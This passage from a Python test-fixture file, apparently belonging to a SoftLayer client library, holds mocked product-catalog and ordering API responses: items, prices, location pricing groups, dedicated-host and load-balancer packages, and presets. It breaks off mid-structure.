# public/private IPs, global IPv4/IPv6, bandwidth, OS) used across ordering
# tests. Prices without 'locationGroupId' or with '' / None are standard
# prices; locationGroupId 1 marks a location-specific price.
getItems = [
    {
        'id': 1234,
        'keyName': 'KeyName01',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'softwareDescription': {
            'id': 1228,
            'longDescription': 'Redhat EL 5.10-64',
            'referenceCode': 'REDHAT_5_64'
        },
        'prices': [{'id': 1122,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 2233,
        'keyName': 'KeyName02',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'prices': [{'id': 4477,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 1239,
        'keyName': 'KeyName03',
        'capacity': '2',
        'description': 'RAM',
        'itemCategory': {'categoryCode': 'RAM'},
        'prices': [{'id': 1133,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 3,
                                    'name': 'RAM',
                                    'categoryCode': 'ram'}]}],
    },
    {
        # Dedicated (private) core flavor — note units PRIVATE_CORE.
        'id': 1240,
        'keyName': 'KeyName014',
        'capacity': '4',
        'units': 'PRIVATE_CORE',
        'description': 'Computing Instance (Dedicated)',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 1007,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        'id': 1250,
        'keyName': 'KeyName015',
        'capacity': '4',
        'units': 'CORE',
        'description': 'Computing Instance',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 1144,
                    'locationGroupId': None,
                    'hourlyRecurringFee': 0.10,
                    'recurringFee': 0.10,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        # Item whose only price is location-group-specific (locationGroupId 1).
        'id': 112233,
        'keyName': 'KeyName016',
        'capacity': '55',
        'units': 'CORE',
        'description': 'Computing Instance',
        'itemCategory': {'categoryCode': 'Computing Instance'},
        'prices': [{'id': 332211,
                    'locationGroupId': 1,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 80,
                                    'name': 'Computing Instance',
                                    'categoryCode': 'guest_core'}]}],
    },
    {
        'id': 4439,
        'keyName': 'KeyName017',
        'capacity': '1',
        'description': '1 GB iSCSI Storage',
        'itemCategory': {'categoryCode': 'iscsi'},
        'prices': [{'id': 2222, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 1121,
        'keyName': 'KeyName081',
        'capacity': '20',
        'description': '20 GB iSCSI snapshot',
        'itemCategory': {'categoryCode': 'iscsi_snapshot_space'},
        'prices': [{'id': 2014, 'hourlyRecurringFee': 0.10}],
    },
    {
        'id': 4440,
        'keyName': 'KeyName019',
        'capacity': '4',
        'description': '4 Portable Public IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
        'prices': [{'id': 4444, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 8880,
        'keyName': 'KeyName0199',
        'capacity': '8',
        'description': '8 Portable Public IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_pub'},
        'prices': [{'id': 8888, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 44400,
        'keyName': 'KeyName0155',
        'capacity': '4',
        'description': '4 Portable Private IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
        'prices': [{'id': 44441, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {
        'id': 88800,
        'keyName': 'KeyName0144',
        'capacity': '8',
        'description': '8 Portable Private IP Addresses',
        'itemCategory': {'categoryCode': 'sov_sec_ip_addresses_priv'},
        'prices': [{'id': 88881, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
    },
    {
        'id': 10,
        'keyName': 'KeyName0341',
        'capacity': '0',
        'description': 'Global IPv4',
        'itemCategory': {'categoryCode': 'global_ipv4'},
        'prices': [{'id': 11, 'hourlyRecurringFee': 0.0, 'recurringFee': 0.0}],
    },
    {
        'id': 66464,
        'keyName': '1_IPV6_ADDRESS',
        'capacity': '64',
        'description': '/64 Block Portable Public IPv6 Addresses',
        'itemCategory': {'categoryCode': 'static_ipv6_addresses'},
        'prices': [{'id': 664641, 'hourlyRecurringFee': '0', 'locationGroupId': '', 'recurringFee': '0'}],
    },
    {
        'id': 610,
        'keyName': 'KeyName031',
        'capacity': '0',
        'description': 'Global IPv6',
        'itemCategory': {'categoryCode': 'global_ipv6'},
        'prices': [{'id': 611, 'hourlyRecurringFee': 0.10, 'recurringFee': 0.10}],
    },
    {'attributes': [],
     'capacity': '0',
     'description': '0 GB Bandwidth',
     'itemCategory': {'categoryCode': 'bandwidth', 'id': 10},
     'keyName': 'BANDWIDTH_0_GB_2',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 1800,
                 "locationGroupId": '',
                 'itemId': 439,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'setupFee': '0',
                 'sort': 99}]},
    {'attributes': [],
     'capacity': '10',
     'description': '10 Mbps Public & Private Network Uplinks',
     'itemCategory': {'categoryCode': 'port_speed', 'id': 26},
     'keyName': '10_MBPS_PUBLIC_PRIVATE_NETWORK_UPLINKS',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0',
                 'id': 272,
                 "locationGroupId": '',
                 'itemId': 186,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0',
                 'setupFee': '0',
                 'sort': 5}]},
    {'attributes': [],
     'capacity': '0',
     'description': 'Ubuntu Linux 14.04 LTS Trusty Tahr (64 bit)',
     'itemCategory': {'categoryCode': 'os', 'id': 12},
     'keyName': 'OS_UBUNTU_14_04_LTS_TRUSTY_TAHR_64_BIT',
     'prices': [{'accountRestrictions': [],
                 'currentPriceFlag': '',
                 'hourlyRecurringFee': '0.10',
                 'id': 37650,
                 "locationGroupId": '',
                 'itemId': 4702,
                 'laborFee': '0',
                 'onSaleFlag': '',
                 'oneTimeFee': '0',
                 'quantity': '',
                 'recurringFee': '0.1',
                 'setupFee': '0.1',
                 'sort': 9}],
     'softwareDescription': {'id': 1362,
                             'longDescription': 'Ubuntu / 14.04-64',
                             'referenceCode': 'UBUNTU_14_64'}}
]
# Fixture: getItemPrices response for the 1 GB iSCSI SAN Storage item
# (item id 1111) — three prices for the same item with different recurring
# fees ('.35', '0', '15'), used to test price selection logic.
getItemPricesISCSI = [
    {
        'currentPriceFlag': '',
        'id': 2152,
        'item': {
            'capacity': '1',
            'description': '1 GB iSCSI SAN Storage',
            'id': 1111,
            'softwareDescriptionId': '',
            'units': 'GB',
            'upgradeItemId': 547},
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{'id': 46626,
                               'itemPriceId': 2152, 'packageId': 0}],
        'quantity': '',
        'recurringFee': '.35',
        'setupFee': '0',
        'sort': 0
    },
    {
        'currentPriceFlag': '',
        'id': 22501,
        'item': {'capacity': '1',
                 'description': '1 GB iSCSI SAN Storage',
                 'id': 1111,
                 'softwareDescriptionId': '',
                 'units': 'GB',
                 'upgradeItemId': 547},
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{
            'id': 252983,
            'itemPriceId': 22501, 'packageId': 0
        }],
        'quantity': '',
        'recurringFee': '0',
        'setupFee': '0',
        'sort': 0
    },
    {
        'currentPriceFlag': '',
        'id': 22441,
        'item': {
            'capacity': '1',
            'description': '1 GB iSCSI SAN Storage',
            'id': 1111,
            'softwareDescriptionId': '',
            'units': 'GB',
            'upgradeItemId': 547
        },
        'itemId': 1111,
        'laborFee': '0',
        'onSaleFlag': '',
        'oneTimeFee': '0',
        'packageReferences': [{'id': 250326,
                               'itemPriceId': 22441, 'packageId': 0}],
        'quantity': '',
        'recurringFee': '15',
        'setupFee': '0',
        'sort': 0
    }]
# Fixture: getItems response used for virtual-server ordering tests — a
# smaller variant of getItems (port speed with/without software description,
# and RAM) where all prices are zero-fee.
getItemsVS = [
    {
        'id': 1234,
        'keyName': 'KeyName01',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'softwareDescription': {
            'id': 1228,
            'longDescription': 'Redhat EL 5.10-64',
            'referenceCode': 'REDHAT_5_64'
        },
        'prices': [{'id': 1122,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 2233,
        'keyName': 'KeyName02',
        'capacity': '1000',
        'description': 'Public & Private Networks',
        'itemCategory': {'categoryCode': 'Uplink Port Speeds'},
        'prices': [{'id': 4477,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 26,
                                    'name': 'Uplink Port Speeds',
                                    'categoryCode': 'port_speed'}]}],
    },
    {
        'id': 1239,
        'keyName': 'KeyName03',
        'capacity': '2',
        'description': 'RAM',
        'itemCategory': {'categoryCode': 'RAM'},
        'prices': [{'id': 1133,
                    'hourlyRecurringFee': 0.0,
                    'recurringFee': 0.0,
                    'categories': [{'id': 3,
                                    'name': 'RAM',
                                    'categoryCode': 'ram'}]}],
    }
]
# Fixture: SoftLayer_Product_Order::verifyOrder response for a dedicated host
# order (package 813, hourly pricing, dal05). The single price (200269) bundles
# the host RAM and disk sub-items. Note the description says "1.2 TB" while
# the keyName says "1_4_TB" — this mirrors the live catalog data and is
# preserved as-is.
verifyOrderDH = {
    'preTaxSetup': '0',
    'storageGroups': [],
    'postTaxRecurring': '3.164',
    'billingOrderItemId': '',
    'presetId': '',
    'hardware': [
        {
            'domain': 't.com',
            'hostname': 't',
            'bareMetalInstanceFlag': '',
            'hardwareStatusId': '',
            'primaryBackendNetworkComponent': {
                'router': {
                    'id': 51218
                },
                'networkVlanId': ''
            },
            'accountId': ''
        }
    ],
    'prices': [
        {
            'itemId': 10195,
            'setupFee': '0',
            'recurringFee': '0',
            'hourlyRecurringFee': '3.164',
            'oneTimeFee': '0',
            'id': 200269,
            'item': {
                'thirdPartyPolicyAssignments': [],
                'capacity': '56',
                'description': '56 Cores X 242 RAM X 1.2 TB',
                'bundle': [
                    {
                        'category': {
                            'categoryCode': 'dedicated_host_ram',
                            'id': 850,
                            'name': 'Dedicated Host RAM'
                        },
                        'itemPriceId': 200301,
                        'itemPrice': {
                            'itemId': 10199,
                            'setupFee': '0',
                            'recurringFee': '0',
                            'hourlyRecurringFee': '0',
                            'oneTimeFee': '0',
                            'id': 200301,
                            'laborFee': '0'
                        },
                        'bundleItemId': 10195,
                        'bundleItem': {
                            'units': 'CORE',
                            'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                            'capacity': '56',
                            'description': '56 Cores X 242 RAM X 1.2 TB',
                            'id': 10195
                        },
                        'id': 41763
                    },
                    {
                        'category': {
                            'categoryCode': 'dedicated_host_disk',
                            'id': 851,
                            'name': 'Dedicated Host Disk'
                        },
                        'itemPriceId': 200299,
                        'itemPrice': {
                            'itemId': 10197,
                            'setupFee': '0',
                            'recurringFee': '0',
                            'hourlyRecurringFee': '0',
                            'oneTimeFee': '0',
                            'id': 200299,
                            'laborFee': '0'
                        },
                        'bundleItemId': 10195,
                        'bundleItem': {
                            'units': 'CORE',
                            'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                            'capacity': '56',
                            'description': '56 Cores X 242 RAM X 1.2 TB',
                            'id': 10195
                        },
                        'id': 41761
                    }
                ],
                'keyName': '56_CORES_X_242_RAM_X_1_4_TB',
                'units': 'CORE',
                'id': 10195
            },
            'laborFee': '0',
            'categories': [
                {
                    'categoryCode': 'dedicated_virtual_hosts',
                    'id': 848,
                    'name': 'Dedicated Host'
                }
            ]
        }
    ],
    'sendQuoteEmailFlag': '',
    'packageId': 813,
    'useHourlyPricing': True,
    'preTaxRecurringMonthly': '0',
    'message': '',
    'preTaxRecurring': '3.164',
    'primaryDiskPartitionId': '',
    'locationObject': {
        'id': 138124,
        'name': 'dal05',
        'longName': 'Dallas 5'
    },
    'taxCompletedFlag': False,
    'isManagedOrder': '',
    'imageTemplateId': '',
    'postTaxRecurringMonthly': '0',
    'resourceGroupTemplateId': '',
    'postTaxSetup': '0',
    'sshKeys': [],
    'location': '138124',
    'stepId': '',
    'proratedInitialCharge': '0',
    'totalRecurringTax': '0',
    'paymentType': '',
    'resourceGroupId': '',
    'sourceVirtualGuestId': '',
    'bigDataOrderFlag': False,
    'extendedHardwareTesting': '',
    'preTaxRecurringHourly': '3.164',
    'postTaxRecurringHourly': '3.164',
    'currencyShortName': 'USD',
    'containerSplHash': '000000003699c54000007f38ef8b0102',
    'proratedOrderTotal': '0',
    'serverCoreCount': '',
    'privateCloudOrderFlag': False,
    'totalSetupTax': '0',
    'quantity': 1
}
# Fixture: items for the LBaaS package — the base service item (standard
# price) and the uptime item whose only price belongs to location group 507
# (matched against regionsLoadbal below).
itemsLoadbal = [
    {
        "capacity": "0",
        "description": "Load Balancer as a Service",
        "id": 10043,
        "keyName": "LOAD_BALANCER_AS_A_SERVICE",
        "itemCategory": {
            "categoryCode": "load_balancer_as_a_service",
            "id": 1116,
            "name": "Load Balancer As A Service",
        },
        "prices": [
            {
                "hourlyRecurringFee": "0",
                "id": 199447,
                "locationGroupId": '',
                "recurringFee": "0",
            }
        ]
    },
    {
        "capacity": "0",
        "description": "Load Balancer Uptime",
        "id": 10785,
        "keyName": "LOAD_BALANCER_UPTIME",
        "itemCategory": {
            "categoryCode": "load_balancer_uptime",
            "id": 1119,
            "name": "Load Balancer Uptime",
        },
        "prices": [
            {
                "hourlyRecurringFee": ".028",
                "id": 205913,
                "locationGroupId": 507,
            }]}
]
# Fixture: region list for the LBaaS package. The wdc01 location belongs to
# pricing groups 507/1303/1783, which lets tests resolve the group-specific
# price in itemsLoadbal.
regionsLoadbal = [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
                   'keyname': 'WASHINGTON_DC',
                   'location': {'location': {'id': 37473,
                                             'longName': 'Washington 1',
                                             'name': 'wdc01',
                                             "groups": [
                                                 {
                                                     "description": "Location Group 4",
                                                     "id": 507,
                                                     "locationGroupTypeId": 82,
                                                     "name": "Location Group 4",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 },
                                                 {
                                                     "description": "COS Cross Region - EU",
                                                     "id": 1303,
                                                     "locationGroupTypeId": 82,
                                                     "name": "eu",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 },
                                                 {
                                                     "description": "COS Regional Frankfurt",
                                                     "id": 1783,
                                                     "locationGroupTypeId": 82,
                                                     "name": "eu-de",
                                                     "locationGroupType": {
                                                         "name": "PRICING"
                                                     }
                                                 }
                                             ]
                                             }},
                   'sortOrder': 10}]
# Fixture: getAllObjects response for the Load Balancer as a Service package
# (id 805), assembled from the item and region fixtures defined above.
getAllObjectsLoadbal = [
    {
        "id": 805,
        "keyName": "LBAAS",
        "name": "Load Balancer As A Service (LBaaS)",
        "items": itemsLoadbal,
        "regions": regionsLoadbal,
    },
]
# Fixture: getAllObjects response for the Dedicated Host package (id 813).
# One host flavor item (10195) with RAM/disk bundle items and two prices:
# standard (200269) and location-group 503 (200271). Description "1.2 TB"
# vs keyName "1_4_TB" mirrors the live catalog and is intentional.
getAllObjectsDH = [{
    "subDescription": "Dedicated Host",
    "name": "Dedicated Host",
    "items": [{
        "capacity": "56",
        "description": "56 Cores X 242 RAM X 1.2 TB",
        "bundleItems": [
            {
                "capacity": "1200",
                "keyName": "1_4_TB_LOCAL_STORAGE_DEDICATED_HOST_CAPACITY",
                "categories": [{
                    "categoryCode": "dedicated_host_disk"
                }]
            },
            {
                "capacity": "242",
                "keyName": "242_GB_RAM",
                "categories": [{
                    "categoryCode": "dedicated_host_ram"
                }]
            }
        ],
        "prices": [
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2099",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.164",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200269,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": "",
                "quantity": ""
            },
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2161.97",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.258",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200271,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": 503,
                "quantity": ""
            }
        ],
        "keyName": "56_CORES_X_242_RAM_X_1_4_TB",
        "id": 10195,
        "itemCategory": {
            "categoryCode": "dedicated_virtual_hosts"
        }
    }],
    "keyName": "DEDICATED_HOST",
    "unitSize": "",
    "regions": [{
        "location": {
            "locationPackageDetails": [{
                "isAvailable": 1,
                "locationId": 138124,
                "packageId": 813
            }],
            "location": {
                "statusId": 2,
                "priceGroups": [{
                    "locationGroupTypeId": 82,
                    "description": "CDN - North America - Akamai",
                    "locationGroupType": {
                        "name": "PRICING"
                    },
                    "securityLevelId": "",
                    "id": 1463,
                    "name": "NORTH-AMERICA-AKAMAI"
                }],
                "id": 138124,
                "name": "dal05",
                "longName": "Dallas 5"
            }
        },
        "keyname": "DALLAS05",
        "description": "DAL05 - Dallas",
        "sortOrder": 12
    }],
    "firstOrderStepId": "",
    "id": 813,
    "isActive": 1,
    "description": "Dedicated Host"
}]
# Fixture: getAllObjects response for a GPU-equipped Dedicated Host flavor.
# Same package (813) and price structure as getAllObjectsDH, but the RAM
# bundle item carries a hardwareGenericComponentModel with component type
# GPU, which tests use to detect GPU hosts.
getAllObjectsDHGpu = [{
    "subDescription": "Dedicated Host",
    "name": "Dedicated Host",
    "items": [{
        "capacity": "56",
        "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
        "bundleItems": [
            {
                "capacity": "1200",
                "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
                "categories": [{
                    "categoryCode": "dedicated_host_disk"
                }]
            },
            {
                "capacity": "242",
                "keyName": "2_GPU_P100_DEDICATED",
                "hardwareGenericComponentModel": {
                    "capacity": "16",
                    "id": 849,
                    "hardwareComponentType": {
                        "id": 20,
                        "keyName": "GPU"
                    }
                },
                "categories": [{
                    "categoryCode": "dedicated_host_ram"
                }]
            }
        ],
        "prices": [
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2099",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.164",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200269,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": "",
                "quantity": ""
            },
            {
                "itemId": 10195,
                "setupFee": "0",
                "recurringFee": "2161.97",
                "tierMinimumThreshold": "",
                "hourlyRecurringFee": "3.258",
                "oneTimeFee": "0",
                "currentPriceFlag": "",
                "id": 200271,
                "sort": 0,
                "onSaleFlag": "",
                "laborFee": "0",
                "locationGroupId": 503,
                "quantity": ""
            }
        ],
        "keyName": "56_CORES_X_484_RAM_X_1_5_TB_X_2_GPU_P100",
        "id": 10195,
        "itemCategory": {
            "categoryCode": "dedicated_virtual_hosts"
        }
    }],
    "keyName": "DEDICATED_HOST",
    "unitSize": "",
    "regions": [{
        "location": {
            "locationPackageDetails": [{
                "isAvailable": 1,
                "locationId": 138124,
                "packageId": 813
            }],
            "location": {
                "statusId": 2,
                "priceGroups": [{
                    "locationGroupTypeId": 82,
                    "description": "CDN - North America - Akamai",
                    "locationGroupType": {
                        "name": "PRICING"
                    },
                    "securityLevelId": "",
                    "id": 1463,
                    "name": "NORTH-AMERICA-AKAMAI"
                }],
                "id": 138124,
                "name": "dal05",
                "longName": "Dallas 5"
            }
        },
        "keyname": "DALLAS05",
        "description": "DAL05 - Dallas",
        "sortOrder": 12
    }],
    "firstOrderStepId": "",
    "id": 813,
    "isActive": 1,
    "description": "Dedicated Host"
}]
# Fixture: SoftLayer_Product_Package::getRegions response for wdc07,
# including its pricing group (us-east) and per-package availability
# (package 46 available at location 2017603).
getRegions = [{
    "description": "WDC07 - Washington, DC",
    "keyname": "WASHINGTON07",
    "location": {
        "locationId": 2017603,
        "location": {
            "id": 2017603,
            "longName": "Washington 7",
            "name": "wdc07",
            "priceGroups": [
                {
                    "description": "COS Regional - US East",
                    "id": 1305,
                    "locationGroupTypeId": 82,
                    "name": "us-east",
                    "locationGroupType": {
                        "name": "PRICING"
                    }
                }
            ]
        }
    },
    "locations": [{
        "location": {
            "euCompliantFlag": False,
            "id": 2017603,
            "longName": "Washington 7",
            "name": "wdc07",
            "statusId": 2},
        "locationPackageDetails": [{
            "isAvailable": 1,
            "locationId": 2017603,
            "packageId": 46
        }]
    }]
}]
# Fixture: getItemPrices response with location-group pricing (group 503 =
# Montreal/Toronto/Amsterdam data centers) for a 4-core guest, a 100 GB local
# disk, and 16 GB RAM. Some locations also embed their region records.
getItemPrices = [
    {
        "hourlyRecurringFee": ".093",
        "id": 204015,
        "recurringFee": "62",
        "categories": [
            {
                "categoryCode": "guest_core"
            }
        ],
        "item": {
            "description": "4 x 2.0 GHz or higher Cores",
            "id": 859,
            "keyName": "GUEST_CORES_4",
        },
        "pricingLocationGroup": {
            "id": 503,
            "locations": [
                {
                    "id": 449610,
                    "longName": "Montreal 1",
                    "name": "mon01",
                    "statusId": 2,
                    "regions": [
                        {
                            "description": "MON01 - Montreal",
                            "keyname": "MONTREAL",
                            "sortOrder": 94
                        }
                    ]
                },
                {
                    "id": 449618,
                    "longName": "Montreal 2",
                    "name": "mon02",
                    "statusId": 2
                },
                {
                    "id": 448994,
                    "longName": "Toronto 1",
                    "name": "tor01",
                    "statusId": 2
                },
                {
                    "id": 350993,
                    "longName": "Toronto 2",
                    "name": "tor02",
                    "statusId": 2
                },
                {
                    "id": 221894,
                    "longName": "Amsterdam 2",
                    "name": "ams02",
                    "statusId": 2,
                    "regions": [
                        {
                            "description": "AMS02 POP - Amsterdam",
                            "keyname": "AMSTERDAM02",
                            "sortOrder": 12
                        }
                    ]
                },
                {
                    "id": 265592,
                    "longName": "Amsterdam 1",
                    "name": "ams01",
                    "statusId": 2
                },
                {
                    "id": 814994,
                    "longName": "Amsterdam 3",
                    "name": "ams03",
                    "statusId": 2
                }
            ]
        }
    },
    {
        "hourlyRecurringFee": ".006",
        "id": 204663,
        "recurringFee": "4.1",
        "item": {
            "description": "100 GB (LOCAL)",
            "id": 3899,
            "keyName": "GUEST_DISK_100_GB_LOCAL_3",
        },
        "pricingLocationGroup": {
            "id": 503,
            "locations": [
                {
                    "id": 449610,
                    "longName": "Montreal 1",
                    "name": "mon01",
                    "statusId": 2
                },
                {
                    "id": 449618,
                    "longName": "Montreal 2",
                    "name": "mon02",
                    "statusId": 2
                },
                {
                    "id": 448994,
                    "longName": "Toronto 1",
                    "name": "tor01",
                    "statusId": 2
                },
                {
                    "id": 350993,
                    "longName": "Toronto 2",
                    "name": "tor02",
                    "statusId": 2
                },
                {
                    "id": 221894,
                    "longName": "Amsterdam 2",
                    "name": "ams02",
                    "statusId": 2
                },
                {
                    "id": 265592,
                    "longName": "Amsterdam 1",
                    "name": "ams01",
                    "statusId": 2
                },
                {
                    "id": 814994,
                    "longName": "Amsterdam 3",
                    "name": "ams03",
                    "statusId": 2
                }
            ]
        }
    },
    {
        "hourlyRecurringFee": ".217",
        "id": 204255,
        "recurringFee": "144",
        "item": {
            "description": "16 GB ",
            "id": 1017,
            "keyName": "RAM_16_GB",
        },
        "pricingLocationGroup": {
            "id": 503,
            "locations": [
                {
                    "id": 449610,
                    "longName": "Montreal 1",
                    "name": "mon01",
                    "statusId": 2
                },
                {
                    "id": 449618,
                    "longName": "Montreal 2",
                    "name": "mon02",
                    "statusId": 2
                },
                {
                    "id": 448994,
                    "longName": "Toronto 1",
                    "name": "tor01",
                    "statusId": 2
                },
                {
                    "id": 350993,
                    "longName": "Toronto 2",
                    "name": "tor02",
                    "statusId": 2
                },
                {
                    "id": 221894,
                    "longName": "Amsterdam 2",
                    "name": "ams02",
                    "statusId": 2
                },
                {
                    "id": 265592,
                    "longName": "Amsterdam 1",
                    "name": "ams01",
                    "statusId": 2
                },
                {
                    "id": 814994,
                    "longName": "Amsterdam 3",
                    "name": "ams03",
                    "statusId": 2
                }
            ]
        }
    }
]
# Fixture: getActivePresets response — three M1 flavor presets for package 835.
getActivePresets = [
    {
        "description": "M1.64x512x25",
        "id": 799,
        "isActive": "1",
        "keyName": "M1_64X512X25",
        "name": "M1.64x512x25",
        "packageId": 835
    },
    {
        "description": "M1.56x448x100",
        "id": 797,
        "isActive": "1",
        "keyName": "M1_56X448X100",
        "name": "M1.56x448x100",
        "packageId": 835
    },
    {
        "description": "M1.64x512x100",
        "id": 801,
        "isActive": "1",
        "keyName": "M1_64X512X100",
        "name": "M1.64x512x100",
        "packageId": 835
    }
]
# Fixture: no account-restricted presets for this account.
getAccountRestrictedActivePresets = list()
# Fixture: minimal reserved-capacity group — only the 'id' field is present.
RESERVED_CAPACITY = [dict(id=1059)]
# Fixture: getItems response for a reserved-capacity offering
# (B1.1x2, 1-year term) with a single standard hourly price.
getItems_RESERVED_CAPACITY = [
    {
        'id': 12273,
        'keyName': 'B1_1X2_1_YEAR_TERM',
        'description': 'B1 1x2 1 year term',
        'capacity': 12,
        'itemCategory': {
            'categoryCode': 'reserved_capacity',
            'id': 2060,
            'name': 'Reserved Capacity',
            'quantityLimit': 20,
            'sortOrder': ''
        },
        'prices': [
            {
                'currentPriceFlag': '',
                'hourlyRecurringFee': '.032',
                'id': 217561,
                'itemId': 12273,
                'laborFee': '0',
                'locationGroupId': '',
                'onSaleFlag': '',
                'oneTimeFee': '0',
                'quantity': '',
                'setupFee': '0',
                'sort': 0,
                'tierMinimumThreshold': '',
                'categories': [
                    {
                        'categoryCode': 'reserved_capacity',
                        'id': 2060,
                        'name': 'Reserved Capacity',
                        'quantityLimit': 20,
                        'sortOrder': ''
                    }
                ]
            }
        ]
    }
]
# Fixture: getItems response for the primary IPv6 address item, priced at
# zero with a standard (non-location) price.
getItems_1_IPV6_ADDRESS = [
    {
        'id': 4097,
        'keyName': '1_IPV6_ADDRESS',
        'itemCategory': {
            'categoryCode': 'pri_ipv6_addresses',
            'id': 325,
            'name': 'Primary IPv6 Addresses',
            'quantityLimit': 0,
            'sortOrder': 34
        },
        'prices': [
            {
                'currentPriceFlag': '',
                'hourlyRecurringFee': '0',
                'id': 17129,
                'itemId': 4097,
                'laborFee': '0',
                'locationGroupId': '',
                'onSaleFlag': '',
                'oneTimeFee': '0',
                'quantity': '',
                'recurringFee': '0',
                'setupFee': '0',
                'sort': 0,
                'tierMinimumThreshold': '',
                'categories': [
                    {
                        'categoryCode': 'pri_ipv6_addresses',
                        'id': 325,
                        'name': 'Primary IPv6 Addresses',
                        'quantityLimit': 0,
                        'sortOrder': 34
                    }
                ]
            }
        ]
    }
]
# Fixture: SoftLayer_Product_Package::getObject response for package 200,
# with empty account-restricted presets, two AC2 active presets (packageId
# 835 as in the live data), and a GPU dedicated-host item. Note the second
# bundle item's 'categories' list mixes a category dict with an embedded
# guest_core item dict — this unusual shape is part of the fixture.
getObject = {
    'id': 200,
    'regions': [{'description': 'WDC01 - Washington, DC - East Coast U.S.',
                 'keyname': 'WASHINGTON_DC',
                 'location': {'location': {'id': 37473,
                                           'longName': 'Washington 1',
                                           'name': 'wdc01'}},
                 'sortOrder': 10}],
    'accountRestrictedActivePresets': [],
    'activePresets': [
        {
            'description': 'AC2.8x60x25',
            'id': 861,
            'isActive': '1',
            'keyName': 'AC2_8X60X25',
            'name': 'AC2.8x60x25',
            'packageId': 835
        },
        {
            'description': 'AC2.8x60x100',
            'id': 863,
            'isActive': '1',
            'keyName': 'AC2_8X60X100',
            'name': 'AC2.8x60x100',
            'packageId': 835
        }],
    "items": [{
        "capacity": "56",
        "description": "56 Cores x 360 RAM x 1.2 TB x 2 GPU P100 [encryption enabled]",
        "bundleItems": [
            {
                "capacity": "1200",
                "keyName": "1.2 TB Local Storage (Dedicated Host Capacity)",
                "categories": [{
                    "categoryCode": "dedicated_host_disk"
                }]
            },
            {
                "capacity": "242",
                "keyName": "2_GPU_P100_DEDICATED",
                "hardwareGenericComponentModel": {
                    "capacity": "16",
                    "id": 849,
                    "hardwareComponentType": {
                        "id": 20,
                        "keyName": "GPU"
                    }
                },
                "categories": [{
                    "categoryCode": "dedicated_host_ram"
                }, {
                    "capacity": "2",
                    "description": "2 x 2.0 GHz or higher Cores",
                    "keyName": "GUEST_CORES_2",
                    "attributes": [
                        {
                            "id": 8261,
                            "attributeTypeKeyName": "ORDER_SAVES_USAGE_FEES"
                        }
                    ],
                    "itemCategory": {
                        "categoryCode": "guest_core",
                        "id": 80
                    }}]
            }
        ],
        "prices": [
            {
